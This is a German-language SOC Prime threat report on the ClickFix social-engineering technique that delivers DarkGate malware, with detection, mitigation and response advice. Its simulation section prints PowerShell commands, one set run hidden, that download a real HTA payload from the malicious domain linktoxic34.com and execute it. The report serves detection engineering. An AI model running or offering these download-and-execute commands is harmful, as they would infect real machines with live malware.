SOC Prime Bias: Medium

16 Dec 2025 18:07 UTC

ClickFix Fallstudie: DarkGate-Malware

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Folgen
ClickFix Fallstudie: DarkGate-Malware
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Zusammenfassung

Der Bericht beschreibt eine Social-Engineering-Methode namens ClickFix, die Benutzer dazu verleitet, einen PowerShell-Befehl zu kopieren und auszuführen, der dann eine bösartige HTA-Datei herunterlädt. Diese HTA-Datei zieht weitere Komponenten nach, darunter ein AutoIt-Skript, das Verzeichnisse erstellt, Dateien ablegt und C2-Kommunikation aufbaut. Die Aktivität wird der DarkGate-Kampagne zugeschrieben und verwendet Base64-Verschleierung sowie Manipulation der Zwischenablage, um eine einfache Erkennung zu vermeiden.

Untersuchung

Analysten entwirrten mehrere Schichten von base64-codiertem Inhalt, der in einer gefälschten Warnseite für Browsererweiterungen eingebettet war, und ermittelten den PowerShell-Befehl, der für das Abrufen von dark.hta von linktoxic34.com verantwortlich ist. Bei Ausführung setzt die HTA eine AutoIt-executable (fckhffh.a3x) ein, die eine DES-Routine ausführt und weitere Nutzlasten startet. Erfasste Netzwerk-Telemetriedaten zeigen HTTP(S)-Verkehr zur bösartigen Domain, gefolgt von einer verketteten Ausführung eines PowerShell-Skripts.

Minderung

Empfohlene Verteidigungsmaßnahmen umfassen Schulungen zur Benutzerbewusstheit, um das Kopieren unbekannter Code-Snippets zu verhindern, das Deaktivieren des Windows-Dialogfelds ‚Ausführen‘ über Gruppenrichtlinien und den Einsatz verhaltensbasierter Antiviruslösungen. Das proaktive Blockieren der bösartigen Domain und die Überwachung von anomalem PowerShell-Ausführungen können das Risiko einer DarkGate-Infektion erheblich verringern.

Reaktion

Wenn ein ClickFix-bezogenes Ereignis identifiziert wird, isolieren Sie das betroffene Endgerät, stoppen Sie alle bösartigen Prozesse, entfernen Sie die HTA- und AutoIt-Artefakte und führen Sie eine forensische Analyse der während des Eindringens erstellten Ordner durch. Aktualisieren Sie die Erkennungslogik, um verdächtige Ausführungsmuster von PowerShell und HTA zu kennzeichnen, und stellen Sie sicher, dass die zugehörige Domain im gesamten Netzwerk blockiert ist.

Angriffsfluss

Simulation der Ausführung

Voraussetzung: Der Telemetrie- und Basislinien-Pre-Flight-Check muss bestanden haben.

Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der Angreifertechnik (TTP), die zum Auslösen der Erkennungsregel entwickelt wurde. Die Befehle und Erzählung MÜSSEN die identifizierten TTPs direkt widerspiegeln und zielen darauf ab, die genaue Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird.

  • Angriffs-Narrativ & Befehle:
    Ein Angreifer, der Zugriff mit niedrigen Rechten auf einem kompromittierten Windows-Host erlangt hat, möchte eine bösartige HTA-Nutzlast herunterladen, die in der ClickFix-Kampagne verwendet wird. Um unauffällig zu bleiben, nutzt der Angreifer PowerShell—ein natives Windows-Tool—damit keine externen Binärdateien eingeführt werden. Der Befehl wird direkt in der Konsole ausgeführt (oder über eine geplante Aufgabe) und beinhaltet die exakte URL, auf die die Regel achtet. Der Download wird im Benutzerverzeichnis %TEMP% gespeichert und dann über Start-Process.

    $url = "https://linktoxic34.com/wp-content/themes/twentytwentytwo/dark.hta"
    $out = "$env:TEMPdark.hta"
    Invoke-WebRequest -Uri $url -OutFile $out
    Start-Process -FilePath $out
  • Regressionstest-Skript: (in sich geschlossen, reproduziert die obigen Schritte)

    # ClickFix HTA-Download-Simulation – löst die Sigma-Regel aus
    $maliciousUrl = "https://linktoxic34.com/wp-content/themes/twentytwentytwo/dark.hta"
    $destPath = "$env:TEMPdark.hta"
    
    try {
        Write-Host "[*] Herunterladen der bösartigen HTA-Nutzlast..."
        Invoke-WebRequest -Uri $maliciousUrl -OutFile $destPath -UseBasicParsing
        Write-Host "[+] Download abgeschlossen. Nutzlast wird ausgeführt..."
        Start-Process -FilePath $destPath -WindowStyle Hidden
    } catch {
        Write-Error "Download oder Ausführung fehlgeschlagen: $_"
    }
  • Aufräumbefehle: (entfernt die heruntergeladene HTA und alle laufenden Instanzen)

    # Entfernen der HTA-Datei und Beenden aller verbleibenden Prozesse
    $htaPath = "$env:TEMPdark.hta"
    if (Test-Path $htaPath) {
        Remove-Item $htaPath -Force
        Write-Host "[*] HTA-Datei entfernt."
    }
    # Beenden Sie jeden Prozess, der möglicherweise von der HTA gestartet wurde (generisches Beispiel)
    Get-Process | Where-Object {$_.Path -like "*dark.hta*"} | Stop-Process -Force